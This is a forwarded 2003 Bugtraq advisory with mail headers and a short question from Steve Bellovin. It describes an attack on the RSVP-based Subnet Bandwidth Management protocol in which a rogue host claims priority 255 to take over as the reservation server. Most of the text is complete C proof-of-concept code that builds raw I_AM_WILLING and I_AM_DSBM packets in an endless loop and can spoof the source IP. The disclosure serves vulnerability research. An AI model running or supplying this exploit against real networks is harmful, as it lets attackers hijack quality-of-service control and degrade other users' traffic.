an attack against one of our protocols?

[Steve Bellovin <smb@research.att.com>]

I haven't checked yet if this is a protocol problem or an 
implementation problem.

------- Forwarded Message

Return-Path: <bugtraq-return-10517-smb=research.att.com@securityfocus.com>
Received: from 127.0.0.1 [127.0.0.1]
	by localhost with IMAP (fetchmail-6.2.3)
	for smb@localhost (single-drop); Mon, 11 Aug 2003 15:42:30 -0400 (EDT)
Received: via tmail-2000(13) for smb; Mon, 11 Aug 2003 15:35:28 -0400 (EDT)
Received: from mail-blue.research.att.com (mail-blue.research.att.com [135.207.30.102])
	by bigmail.research.att.com (8.11.6+Sun/8.11.6) with ESMTP id h7BJZRZ22322
	for <smb@bigmail.research.att.com>; Mon, 11 Aug 2003 15:35:27 -0400 (EDT)
Received: by mail-blue.research.att.com (Postfix)
	id E18F9B7B83; Mon, 11 Aug 2003 15:32:23 -0400 (EDT)
Delivered-To: smb@research.att.com
Received: by mail-blue.research.att.com (Postfix, from userid 612)
	id D29A6B7E99; Mon, 11 Aug 2003 15:32:23 -0400 (EDT)
Received: from janus (fpfw.research.att.com [135.207.1.2])
	by mail-blue.research.att.com (Postfix) with SMTP id 1DF45B7B83
	for <smb@research.att.com>; Mon, 11 Aug 2003 15:32:23 -0400 (EDT)
Received: from mail-pink.research.att.com ([192.20.225.111]) by janus; Mon, 11 Aug 2003 15:35:26 -0400 (EDT)
Received: from outgoing2.securityfocus.com (outgoing2.securityfocus.com [205.206.231.26])
	by mail-pink.research.att.com (Postfix) with ESMTP id B811558262
	for <smb@research.att.com>; Mon, 11 Aug 2003 15:34:27 -0400 (EDT)
Received: from lists.securityfocus.com (lists.securityfocus.com [205.206.231.19])
	by outgoing2.securityfocus.com (Postfix) with QMQP
	id 6A37A8F6A4; Mon, 11 Aug 2003 13:22:20 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 14785 invoked from network); 11 Aug 2003 13:02:26 -0000
Date: 11 Aug 2003 19:07:47 -0000
Message-ID: <20030811190747.7854.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: <root@networkpenetration.com>
To: bugtraq@securityfocus.com
Subject: Subnet Bandwidth Management (SBM) Protocol subject to attack via
    the Resource Reservation Protocol (RSVP)
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by bigmail.research.att.com id h7BJZRZ22322
X-Spam-Status: No, hits=-104.5 required=5.0
	tests=BAYES_01,KNOWN_MAILING_LIST,NO_REAL_NAME,USER_IN_WHITELIST
	version=2.55
X-Spam-Level: 
X-Spam-Checker-Version: SpamAssassin 2.55 (1.174.2.19-2003-05-19-exp)



Network Penetration
www.networkpenetration.com
Copyright (c) 2003 Ste Jones
root@networkpenetration.com

Subnet Bandwidth Management (SBM) Protocol subject to attack via the 
Resource Reservation Protocol (RSVP)


Introduction
- ------------

The resource reservation protocol (RSVP) is used within the Subnet 
Bandwidth Management protocol (RFC 2814) and is vulnerable to allowing a 
rogue host hijack control of a server via the use of priority assignemnt. 
By specifying a higher priority than the current RSVP server would allow 
the current server to be pre-empted and a rogue one take its place.

How the attack works
- --------------------

Send I_AM_WILLING RSVP packets to be the resource resvervation protocol 
server to indicate that the the source host is willing to be a RSVP server.

Send I_AM_DSBM RSVP packets to indicate that the source address has a 
priority of 255 (1 byte - thus highest possible priority). If the server 
has a lower priority, it will be pre-empted and the source address will 
take over and act as the resource reservation server.  

For politceness four I_AM_WILLING packers are sent, followed by a 
I_AM_DSBM packet every five seconds after that. This should ensure that 
while the I_AM_DSBM packets are being sent the orignal RSVP server would 
not handle resoure priority assignment. Tested against a Windows 2000 RSVP 
server, but as this is a protocol attack it is assumed that would work 
against any RSVP server.

For more information see http://support.microsoft.com/?kbid=228830
For more information see http://support.microsoft.com/?kbid=247101


Further Attacks Possible
- ------------------------
A spoofed server could allow different hosts to have a different level of 
quality of service (QoS), either giving a higher level priority to a host 
or reducing the priority of a video link or a VoIP connection for example. 




Proof of concept code
- ---------------------

//Network Penetration
//www.networkpenetration.com
//ste jones root@networkpenetration.com
//
//Proof of concept code for attack against RSVP / SBM (RFC 2814)
//compile: gcc rsvp.c -Wall -o RSVP_DoS
//Allows spoofing of source IP with -s
//Tested on linux against win2k server
//You will need to be root to launch the attack as we are using raw sockets

/*RSVP
 * Resource ReserVation Protocol Munger
 * 
 * multicast IP 224.0.0.17
 * IP protocol number 0x2e for RSVP
 *
 * RSVP Header
 * Version = 4bits
 * flags = 4 bits
 * message type = 8 bits = 67 = I_AM_DSBM
 * RSVP checksum = 16 bits = set to 0's 
 * TTL = 8 bits = 1 on multicast
 * Reserved = 8 bits
 * RSVP length = 16 bits
 * + data
 *
 * Data header
 * Length = 16 bits
 * Class = 8 bits
 * type = 8 bits
 * Obj contents 
 */

/*
 *Proof of concept - doesn;t check if RSVP priority of server assumes lower
 */
#include <netinet/in.h>
#include <stdlib.h>
#include <unistd.h>
#include <getopt.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <errno.h>
#include <string.h>
#include <arpa/inet.h>

void usage(char *progname);
void startattack(void);
unsigned short in_chksum(unsigned short *pts, int nbytes);

struct rsvphead{
	int flags:4;
	int version:4;
	char type:8;
	int checksum:16;
	char ttl:8;
	char reserved:8;
	int length:16;
};

struct rsvpdata{
	char buf[40];
};
		

struct header{
	struct iphdr ip;
	struct rsvphead rhead;
	struct rsvpdata rdata;
};

struct in_addr spoofed;

int main(int argc, char *argv[])
{
	
	int c;
	printf("RSVP Munger by Ste Jones from NetworkPenetration.com\n");
	printf("----------------------------------------------------\n");
	opterr = 0; //stop error messages from command line
	while ((c=getopt(argc, argv, "s:")) != -1){
		switch(c){
			case 's':	if(!inet_aton(optarg, &spoofed)){
						printf("Malformed IP 
address: %s\n",optarg);
						exit(1);
					}
					break;
					
			default:	usage(argv[0]);
					exit(1);
					break;
		}
	}
	for(;;){
	startattack();
	}
	exit(0);
}
	
void startattack(void)
{
	struct header heada;
	struct sockaddr_in sin;
	int sock;
	int on;
	int sinlen;
	int willing;
	unsigned char *sourceip;
	on = 1;
	willing = 4; //send willing four times then I_AM_DBSM
	printf("\nSending %d I_AM_WILLING packets followed by I_AM_DSBM 
packets every 5 seconds\n\n", willing);
	for(;;){
		
		memset(&heada, '\0', sizeof(heada));
		if(willing) printf("Creating I_AM_WILLING packet\n");
		else printf("Creating I_AM_DSBM packet\n");

		heada.ip.ihl = 5;
		heada.ip.version = 4;
		heada.ip.tos = 0xc0; //same options as set by Microsoft 
RSVP
		if(willing) heada.ip.tot_len = htons(56);
		else heada.ip.tot_len = htons(64);
		heada.ip.id = 0x0000; //checksum calculate later
		heada.ip.frag_off = 0;
		heada.ip.ttl = 1; //multicast uses ttl of 1
		heada.ip.protocol = 0x2e; //RSVP protocol number
		heada.ip.check = 0;
		if(spoofed.s_addr){
			heada.ip.saddr = spoofed.s_addr;
		}
		else heada.ip.saddr = 0; //let kernel decide
		heada.ip.daddr = inet_addr("224.0.0.17");
		
		sourceip = (unsigned char *)&heada.ip.saddr;
			
		heada.rhead.flags   = 0;
		heada.rhead.version = 1;
		if(willing) heada.rhead.type    = 0x42; //I_AM_WILLING
		else heada.rhead.type    = 0x43; //I_AM_DSBM
		
		heada.rhead.checksum= 0x0000; //checksum calculated later
		heada.rhead.ttl     = 0x01;
		heada.rhead.reserved= 0x00;
		if(willing) heada.rhead.length = 0x2400;
		else heada.rhead.length  = 0x2c00;
		
		heada.rdata.buf[0]  = 0x00;//length
		heada.rdata.buf[1]  = 0x08;//length
		heada.rdata.buf[2]  = 0x2a;//0x2a01 = DSBM IP ADDR 
		heada.rdata.buf[3]  = 0x01;
		heada.rdata.buf[4]  = sourceip[0];//IP address
		heada.rdata.buf[5]  = sourceip[1];//if not spoofed DSBM IP 
ADDR = 0
		heada.rdata.buf[6]  = sourceip[2];//
		heada.rdata.buf[7]  = sourceip[3];//
		
		heada.rdata.buf[8]  = 0x00;//length
		heada.rdata.buf[9]  = 0x0c;//length
		heada.rdata.buf[10]  = 0xa1;//0a101 = RSVP_HOP_L2, IEEE 
canonical addr
		heada.rdata.buf[11]  = 0x01;
		heada.rdata.buf[12]  = 0x00; //mac addr
		heada.rdata.buf[13]  = 0x11; //
		heada.rdata.buf[14]  = 0x22; //
		heada.rdata.buf[15]  = 0x33; //
		heada.rdata.buf[16]  = 0x44; //
		heada.rdata.buf[17]  = 0x55; //
		heada.rdata.buf[18]  = 0x00; //
		heada.rdata.buf[19]  = 0x00; //
		
		heada.rdata.buf[20]  = 0x00; //length
		heada.rdata.buf[21]  = 0x08; //length
		heada.rdata.buf[22]  = 0x2b; // 0x2b01 = SMB_Priority
		heada.rdata.buf[23]  = 0x01; //
		heada.rdata.buf[24]  = 0x00; //priority
		heada.rdata.buf[25]  = 0x00; //priority
		heada.rdata.buf[26]  = 0x00; //priority
		if(!willing)heada.rdata.buf[27]  = 0xff; //priority 255
		else heada.rdata.buf[27] = 0xff; //priority 
		//priority = 255 
		//highest possible priority
		//if server has lower priority vulernable to DoS
		
		if(!willing){
			heada.rdata.buf[28]  = 0x00; //length
			heada.rdata.buf[29]  = 0x08; //length
			heada.rdata.buf[30]  = 0x2c; //0x2c01 = DSBM timer 
intervals
			heada.rdata.buf[31]  = 0x01;
			heada.rdata.buf[32]  = 0x00; //retransmit time
			heada.rdata.buf[33]  = 0x00; //
			heada.rdata.buf[34]  = 0x0f; //0x0f?
			heada.rdata.buf[35]  = 0x05; //time 5 seconds
		}

		heada.ip.check = in_chksum((unsigned short *)&heada.ip, 
20);
	
		sin.sin_family = AF_INET;
		sin.sin_port = htons(0); 
		sin.sin_addr.s_addr = inet_addr("224.0.0.17");

		if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
			printf("Socket error %s\n",strerror(errno));
			exit(1);
		}

		if((setsockopt(sock,IPPROTO_IP, IP_HDRINCL, &on, sizeof
(on))) < 0){
			printf("Setsockopt error %s\n",strerror(errno));
			exit(1);
		}
	
		sinlen = sizeof(sin);
	
		if(willing){
			if(sendto(sock, &heada, 56, 0, (struct sockaddr *)
&sin, sinlen) != 56){
				printf("Sento error\n");
				exit(1);
			}
			printf("Sent I_AM_WILLING packet\n");
		}
			
		else{
			if(sendto(sock, &heada, 64, 0, (struct sockaddr *)
&sin, sinlen) != 64){
				printf("Sento error\n");
				exit(1);
			}
		printf("Sent I_AM_DBSM packet\n");
		}

		close(sock);
		if(willing) willing--;
		sleep(5);
	}
}

void usage(char *progname)
{
	printf("\n%s\n", progname);
	printf("\t-s <ip address> Spoof source IP address\n");
	printf("\n");
		
	exit(1);
}

unsigned short in_chksum(unsigned short *pts, int nbytes)
{
        register long sum;
        u_short oddbyte;
        register u_short answer;
				 
        sum = 0;
        while(nbytes > 1){
                sum += *pts++;
                nbytes -=2;
       }
						 
        if(nbytes == 1){
                oddbyte = 0;
                *((u_char *) &oddbyte) = *(u_char *)pts;
                sum += oddbyte;
        }
							 
        sum = (sum >> 16) + (sum &0xffff);
        sum += (sum >>16);
        answer = ~sum;
        return(answer);
}


------- End of Forwarded Message



		--Steve Bellovin, http://www.research.att.com/~smb